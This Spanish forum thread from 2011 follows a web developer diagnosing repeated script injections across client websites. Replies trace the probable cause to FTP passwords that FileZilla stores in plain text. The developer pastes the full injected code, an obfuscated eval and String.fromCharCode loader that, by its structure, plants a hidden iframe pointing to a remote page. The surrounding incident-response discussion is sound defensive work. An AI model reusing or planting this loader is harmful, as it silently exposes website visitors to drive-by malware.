|
Título: Virus en mis páginas webs Publicado por: MrPoor en 5 Agosto 2011, 11:15 am Buenos días soy Programador Web.
No sé como pero se ha metido un virus en casi todas las páginas webs de mis clientes. La cuestión es que no veo un punto de entrada común salvo mi ordenador, me explico: 1. - Se ha introducido en tres aplicaciones diferentes: Joomla, Prestashop, y un CMS Propio. Por eso "creo" que descarto cualquier tipo de bug de las aplicaciones, ya que es siempre el mismo virus en los tres tipo de aplicaciones, y no puede haber el mismo tipo de fallo. 2. ¿Puede ser fallo del servidor?, porque los tres tienen Apaches con con versiones diferentes. A no ser, que haya un fallo común no detectado en Apache o PHP, o algo que ignore. Os dejo cabeceras de varios servidores afectados, en diferentes hosting (1and1, CDMON, stratos): TTP/1.1 200 OK Date: Fri, 05 Aug 2011 09:09:55 GMT Server: Apache/2.2.3 (CentOS) Cneonction: close Content-Type: text/html; charset=ISO-8859-1 HTTP/1.1 200 OK Date: Fri, 05 Aug 2011 09:10:36 GMT Server: Apache X-Powered-By: PHP/5.2.14 Content-Type: text/html HTTP/1.1 200 OK Date: Fri, 05 Aug 2011 09:10:50 GMT Server: Apache X-Powered-By: PHP/5.2.5 Content-Type: text/html 3. Puede ser mi ordenador, según el Avast está límpio, y no tengo conexiones abiertas por netstat.exe (uso Windows). No sé muy bien que puede ser, Cualquier ayuda es bienvenida. Elimino el virus, y cada X tiempo vuelve a aparecer. Me está causando muchos problemas. No encuentro nada en Google, etc. Dejo un extracto del virus, si lo necesitáis completo me decís por favor, donde subirlo: <script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o... Resto de virus... Título: Re: Virus en mis páginas webs Publicado por: MrPoor en 5 Agosto 2011, 11:17 am Pongo el virus completo, pensaba que no me iba a dejar:
Código: <script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>Infecta diferentes ficheros, donde le da la gana. Título: Re: Virus en mis páginas webs Publicado por: madpitbull_99 en 5 Agosto 2011, 12:16 pm Puede que el servidor entero esté afectado y por tanto todos los dominios/vhosts que aloja.
Si estás usando un VPS lo más probable es que sea eso. Tampoco descartes la posibilidad de que se haya colado mediante alguna vulnerabilidad de los CMS o del propio Apache. Mira todos los scripts/ficheros en busca de alguno con nombre sospechoso (o no), podrías intentar hacer un grep para ver si hay algún script que añade ese JS malicioso a los demás ficheros. PD: Te lo muevo a seguridad. Ahí encaja mejor. Título: Re: Virus en mis páginas webs Publicado por: MrPoor en 5 Agosto 2011, 13:39 pm Gracias por moverlo.
No uso VPS, y lo raro es que son 3 servidores distintos, unos están en CDMON, otros en Stratos y otros en 1and1, vamos tres proveedores diferentes. Son todos hosting compartido, no tengo acceso a la shell. Es que no tengo ni idea. Gracias de nuevo, y cualquier sugerencia bienvenida. Tampoco tengo acceso a los logs. Uno puede que se me haya metido a través de un chat online ahora que recuerdo, pero el resto no tiene ese chat online, y como digo, son servidores diferentes, que para nada están relacionados. Título: Re: Virus en mis páginas webs Publicado por: MrPoor en 5 Agosto 2011, 14:21 pm Una pista, ahora que me doy cuenta, que ha pasado en todos los clientes:
- No se añade a la base de datos, sino que sobreescribe el fichero a las páginas web, después antes fin de cierre del body <SCRIPT DEL VIRUS> </SCRIPT> </body> </html> Curiosamente siempre ataca a los mismos ficheros en cada aplicacióin Los permisos de las carpetas y subcarpetas son: 755 y los de ficheros 644 Por lo que solo admin o el dueño puede cambiarlo. Todo comprobado, no hay ficheros ni carpetas con otros permisos de lectura. Eso me hace descartar cualquier virus a nivel de aplicación. El dueño y grupo de los ficheros está correcto. ¿No parece esto más relacionado con mi cliente de FTP? Uso filezilla, pero una cosa rara es que el DreamWeaver me está fallando como nunca, se bloquea cosa que nunca hacia antes. Pienso que algo puede haber robado los ficheros con los perfiles en Filezilla o DreamWeaver. Hace poco quite un virus extraño, pero en descripción en internet no ponía ningún efecto de este tipo. Por si esto puede ayudar. Saludos. Título: Re: Virus en mis páginas webs Publicado por: Novlucker en 5 Agosto 2011, 14:22 pm La verdad no se me ocurre nada y es bastante curioso lo que dices, yo también me hubiese jugado por una infección del lado del proveedor, pero no tiene sentido si lo único que hay en común entre esos tres servidores eres tú.
Y no tienes acceso de shell a los servidores? Prueba revisando tu pc con otro AV http://foro.elhacker.net/software/cds_autoarrancables_de_recuperacion_para_casos_de_emergencia-t204137.0.html (ahí tienes unos booteables) [Edito] Ahora viendo tu respuesta si noto un pequeño detalle. Hace algunos días salió a la luz que Filezilla guarda las credenciales en texto plano, por lo que una función "útil" para un "bicho" es buscar los ficheros de este programa ... http://bit.ly/owLeNo Yo que tú probaría cambiando las contraseñas :) Saludos Título: Re: Virus en mis páginas webs Publicado por: MrPoor en 5 Agosto 2011, 15:00 pm ¡Si señor, lo estamos pillando!, casi seguro que es el filezilla.
He ido a: C:\Documents and Settings\MIUSUARIO\Datos de programa\FileZilla y hay dos ficheros que contienen contraseñas en texto plano, como bien dice Novlucker. Un fichero es filezilla.xml, que curiosamente tiene ahora mismo SOLO las contreseñas de los dos alojamiento infectados hoy, porque lo usé antes para eliminarlo, y el otro es sitemanager.xml, que ese sí contiene las contraseñas de todos mis sitios. Os explico, el virus es clicico, afecto a 18 clientes en la primera vuelta, y hoy a comenzado la segunda, ayer infectó un sitio, y hoy 3. Está infectando ahora mismo. ¿Como podría pillarlo? -------------------------- Se me ocurre tres formas: 1. Con un programa que vigile cuando un programa accede a un fichero. O sea, un filemonitor pero al revés. 2: cojo el fichero sitemanager.xml y lleno el campo <pass></pass> de A'es, a ver si provoca un overflow (con suerte está mal programado), y salta la ventana de windows, etc 3. eliminio el fichero sitemanager.xml, con suerte se cuelga el bicho. Me imagino que no tienen una copia local, porque como digo es cíclico, supongo que revisa todo cada x tiempo por si hay un sitio nuevo. ¿sabéis algún programa que haga el punto 1 para Windows XP? ¿alguna otra solución? Repito, el virus está infectando por ahí ahora mismo. Saludos. Título: Re: Virus en mis páginas webs Publicado por: Novlucker en 5 Agosto 2011, 15:26 pm Para la opción 1 puedes usar Process Monitor (http://technet.microsoft.com/en-us/sysinternals/bb896645) agregando un filtro por PATH.
Aunque tienes que estar atento y limpiar el log cada un rato porque es una bestialidad la cantidad de datos que recolecta y puede llegar a colgarse :P Podrías intentar también subiendo el nivel del Firewall si lo tienes, de modo que en cuanto el "bicho" intente conectarse salte. Saludos Título: Re: Virus en mis páginas webs Publicado por: .:UND3R:. en 8 Agosto 2011, 11:14 am creo que el problema es por parte de tu computador, recuerda que no por que tu antivirus no detecte virus, quiere decir que no los tengas...
-los archivos que son modificados, solo pueden ser alterados por el administrador, ahora crea un html y verifica si este se modifica inmediatamente o demora, me refiero en el tiempo en que tú estás modificando,o accediendo a la web como administrador, puede ser que tengas algún troyano enviado por la competencia, ya teniendo tu contraseña están editando el index, lo que puedes hacer para eso es ver los accesos con las IP así descartas si es un troyano, aunque este podría modificar el index desde tu mismo computador, hace otra prueba entra desde otro ordenador y que este nunca haya tenido acceso con el ordenador en el que estás (USB,CD,ETC) crea un fichero, html y ve si este se ha modifcado ahí podrás saber de donde viene el problema, te recomiendo que de todas formas cambies la contraseña lo antes posible. creo que con lo que te comenté podrás acorralar el causante del problema, saludos Título: Re: Virus en mis páginas webs Publicado por: MrPoor en 8 Agosto 2011, 12:03 pm Buenas de nuevo,
Como dice .:UND3R:. en problema está en mi ordenador, sin duda. Explico: Tengo un cliente que no está en el Filezilla. Ayer se infectaron otros que no estaban infectados y ese cliente no. Por lo tanto: 1. 100% seguro tiene que ver con el Filezilla y las contraseñas en texto plano. 2. Pasé un escaneo completo del avast, y encontró un bicho en la carpeta system-volumen-information. Lo eliminé sin verificar que era (fallo). 3. Con el process monitor, veo una cosa rara: Cuando abro filezilla, unos segundos después se abre el svchost.exe (http://img714.imageshack.us/img714/1264/dibujoxuf.jpg) (http://imageshack.us/photo/my-images/714/dibujoxuf.jpg/) Uploaded with ImageShack.us (http://imageshack.us) En sucesivas pruebas, si abro y cierro rápido el Filezilla el svchost.exe no se lanza. El svchost es un servicio legítimo de Windows, y se arranca con la ruta legítima (c:\windows\system32\svchost.exe. El svchost en algo así como un lanzador de procesos, y ese PID en concreto, lanza esto: C:\WINDOWS\system32\svchost.exe -k netsvcs Ahí continúo investigando en Google, pero la información es imprecisa, hay páginas que dicen que es un virus, hay otras que dicen que es un servicio legítimo, etc. La cuestión es que, en la carpeta c:\windows\system32\ no está tal fichero. ¿puede estar troyanizado el propio svchost, o el filezilla.exe? Título: Re: Virus en mis páginas webs Publicado por: Novlucker en 8 Agosto 2011, 17:51 pm Ese servicio si es normal, prueba filtrando también por Operation ReadFile
Saludos Título: Re: Virus en mis páginas webs Publicado por: .:UND3R:. en 8 Agosto 2011, 19:09 pm Mira te propongo dos ideas
1-prueba con un nuevo antivirus (idea típica y generalizada) 2-hazle un checksum al svchost y luego busca que versión y build posees, luego envíanos los datos para que alguien con el mismo sistema operativo nos corrobore si el checksum es correcto 3-prueba cambiando filezila por cyberduck otro potente gestor ftp 4-prueba lanzar filezila desde modo seguro, para saber si originalmente svchost está infectado o otro proceso inyecta a svchost para que este inyecte a mozilla (Sería un lindo método descubierto por ti) Saludos Título: Re: Virus en mis páginas webs Publicado por: VanX en 13 Agosto 2011, 17:34 pm Pasale el DrWeb a tu pc ;)
|